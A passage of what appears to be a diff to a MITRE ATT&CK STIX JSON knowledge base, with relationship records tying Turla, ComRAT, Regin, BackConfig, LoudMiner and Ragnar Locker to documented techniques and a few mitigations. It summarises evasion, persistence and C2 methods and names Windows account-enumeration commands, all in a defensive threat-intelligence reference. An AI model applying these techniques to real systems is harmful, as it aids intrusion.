+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
+ "target_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Regin",
+ "description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ }
+ ],
+ "description": "[Regin](https://attack.mitre.org/software/S0019) has used a hidden file system to store some of its components.(Citation: Kaspersky Regin)",
+ "relationship_type": "uses",
+ "id": "relationship--223b8d4b-97e9-4581-91aa-a599fb787309",
+ "type": "relationship",
+ "modified": "2020-06-29T01:54:53.487Z",
+ "created": "2020-06-29T01:50:21.819Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used net group \"Domain Admins\" /domain to identify domain administrators.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bcd2cfa1-793c-40a7-9920-614539e651a7",
+ "type": "relationship",
+ "modified": "2020-06-29T02:52:31.516Z",
+ "created": "2020-06-29T02:52:31.516Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used net localgroup and net localgroup Administrators to enumerate group information, including members of the local administrators group.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--059cc1e2-9570-4760-8137-d3d71b66bb78",
+ "type": "relationship",
+ "modified": "2020-06-29T02:52:31.565Z",
+ "created": "2020-06-29T02:52:31.565Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used net user /domain to enumerate domain accounts.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--689d5a99-cfcf-43d6-ae55-9bf920986f63",
+ "type": "relationship",
+ "modified": "2020-06-29T02:52:31.569Z",
+ "created": "2020-06-29T02:52:31.569Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used net user to enumerate local accounts on the system.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8a47e81d-be1f-488c-8136-40e18c70d45f",
+ "type": "relationship",
+ "modified": "2020-06-29T02:52:31.571Z",
+ "created": "2020-06-29T02:52:31.571Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used net accounts and net accounts /domain to acquire password policy information.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f946b4f9-a18e-4a1e-856c-2c215f78f8be",
+ "type": "relationship",
+ "modified": "2020-06-29T02:56:20.597Z",
+ "created": "2020-06-29T02:56:20.597Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--150e1b1c-a575-4542-a66e-c1646212744b",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.132Z",
+ "created": "2020-06-29T03:10:22.271Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used a scheduled task to launch its PowerShell loader.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--19153106-5607-4cac-91a5-c2a900bc5343",
+ "type": "relationship",
+ "modified": "2020-06-29T03:27:50.994Z",
+ "created": "2020-06-29T03:27:50.994Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used unique per machine passwords to decrypt the orchestrator payload and a hardcoded XOR key to decrypt its communications module. [ComRAT](https://attack.mitre.org/software/S0126) has also used a unique password to decrypt the file used for its hidden file system.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ad8fdfa4-5e0b-437d-9723-9bc5a272f465",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.141Z",
+ "created": "2020-06-29T03:27:51.019Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used encryption and base64 to obfuscate its orchestrator code in the Registry. [ComRAT](https://attack.mitre.org/software/S0126) has also embedded an XOR encrypted communications module inside the orchestrator module. [ComRAT](https://attack.mitre.org/software/S0126) has encrypted its virtual file system using AES-256 in XTS mode.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3a86072e-4ca6-4b5d-bf31-b17c250f572e",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.174Z",
+ "created": "2020-06-29T03:27:51.057Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has encrypted and stored its orchestrator code in the Registry.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c2496cf4-b502-44cf-ae85-efb9b882a4b1",
+ "type": "relationship",
+ "modified": "2020-06-29T03:27:51.063Z",
+ "created": "2020-06-29T03:27:51.063Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has injected its orchestrator DLL into explorer.exe. [ComRAT](https://attack.mitre.org/software/S0126) has also injected its communications module into the victim's default browser to make C2 connections appear less suspicious as all network connections will be initiated by the browser process.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--39647c47-c73d-4da7-9b1a-8c67f20c1890",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.169Z",
+ "created": "2020-06-29T03:27:51.065Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used fsutil fsinfo drives to list connected drives.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7dd2714d-aa8a-40ce-bae1-98634090ac01",
+ "type": "relationship",
+ "modified": "2020-06-29T03:33:39.040Z",
+ "created": "2020-06-29T03:33:39.040Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used cmd.exe to execute commands.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9800fd7a-d2e1-4188-a991-7b8e09edaa13",
+ "type": "relationship",
+ "modified": "2020-06-29T03:41:07.256Z",
+ "created": "2020-06-29T03:41:07.256Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used PowerShell to load itself every time a user logs in to the system. [ComRAT](https://attack.mitre.org/software/S0126) can execute PowerShell scripts loaded into memory or from the file system.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bdac1391-310e-4511-b272-b80924166723",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.178Z",
+ "created": "2020-06-29T03:41:07.285Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has the ability to use the Gmail web UI to receive commands and exfiltrate information.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6ff34c78-2c85-4be5-b3db-0ec8543087d9",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.176Z",
+ "created": "2020-06-29T03:41:07.302Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) can load a PE file from memory or the file system and execute it with CreateProcessW.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7eaf474f-7755-41d7-96c6-811889457be2",
+ "type": "relationship",
+ "modified": "2020-06-29T04:05:19.072Z",
+ "created": "2020-06-29T04:05:19.072Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) can use SSL/TLS encryption for its HTTP-based C2 channel. [ComRAT](https://attack.mitre.org/software/S0126) has used public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--217ad0a6-f693-416e-9ae4-bcc0c533ce9f",
+ "type": "relationship",
+ "modified": "2020-06-30T22:03:27.124Z",
+ "created": "2020-06-29T04:05:19.098Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to gather the victim's computer name.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8763c8dd-cd68-4402-be43-4dbd96c83c2d",
+ "type": "relationship",
+ "modified": "2020-06-29T15:17:53.832Z",
+ "created": "2020-06-29T15:17:53.832Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--8b5b1096-80f7-43dd-a881-af92beac20f9",
+ "type": "relationship",
+ "modified": "2020-06-29T15:36:41.688Z",
+ "created": "2020-06-29T15:36:41.688Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has the ability to identify folders and files related to previous infections.(Citation: Unit 42 BackConfig May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2597e12c-c342-4ca0-a235-b05752b2bfa5",
+ "type": "relationship",
+ "modified": "2020-06-29T15:56:13.237Z",
+ "created": "2020-06-29T15:53:14.495Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
+ "target_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "relationship_type": "mitigates",
+ "description": "Use application control to mitigate installation and use of unapproved virtualization software.",
+ "id": "relationship--f9deebbf-5710-4e54-b4be-83404cee35da",
+ "type": "relationship",
+ "modified": "2020-07-06T19:03:40.425Z",
+ "created": "2020-06-29T22:23:14.216Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31",
+ "target_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "relationship_type": "mitigates",
+ "description": "Disable Hyper-V if not necessary within a given environment.",
+ "id": "relationship--1ec28c41-586b-42dc-9400-6e6313e38d84",
+ "type": "relationship",
+ "modified": "2020-07-06T19:03:40.431Z",
+ "created": "2020-06-29T22:23:14.236Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) has used QEMU and VirtualBox to run a Tiny Core Linux virtual machine, which runs XMRig and makes connections to the C2 server for updates.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9fc89cc1-ef57-461c-9324-0ebe43999c07",
+ "type": "relationship",
+ "modified": "2020-06-29T22:47:34.564Z",
+ "created": "2020-06-29T22:47:34.564Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) has used VboxVmService to run a Linux virtual machine as a service for persistence.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--80bead39-b050-48d9-b185-aa31d1681a61",
+ "type": "relationship",
+ "modified": "2020-06-29T23:17:50.379Z",
+ "created": "2020-06-29T23:17:50.379Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has been delivered as an unsigned MSI package that was executed with msiexec.exe.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bf5b23c2-9b65-4909-ae6c-21b8ccadd930",
+ "type": "relationship",
+ "modified": "2020-06-30T00:18:39.773Z",
+ "created": "2020-06-30T00:18:39.773Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ },
+ {
+ "source_name": "Cynet Ragnar Apr 2020",
+ "url": "https://www.cynet.com/blog/cynet-detection-report-ragnar-locker-ransomware/",
+ "description": "Gold, B. (2020, April 27). Cynet Detection Report: Ragnar Locker Ransomware. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--05951058-e8d4-4ace-a6b8-54735c6a4769",
+ "type": "relationship",
+ "modified": "2020-06-30T00:18:39.795Z",
+ "created": "2020-06-30T00:18:39.795Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables [Ragnar Locker](https://attack.mitre.org/software/S0481) to encrypt files on the host operating system, including files on any mapped drives.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--913c67d5-0c5b-40d5-be88-6ce4e5030603",
+ "type": "relationship",
+ "modified": "2020-06-30T00:18:39.805Z",
+ "created": "2020-06-30T00:18:39.805Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
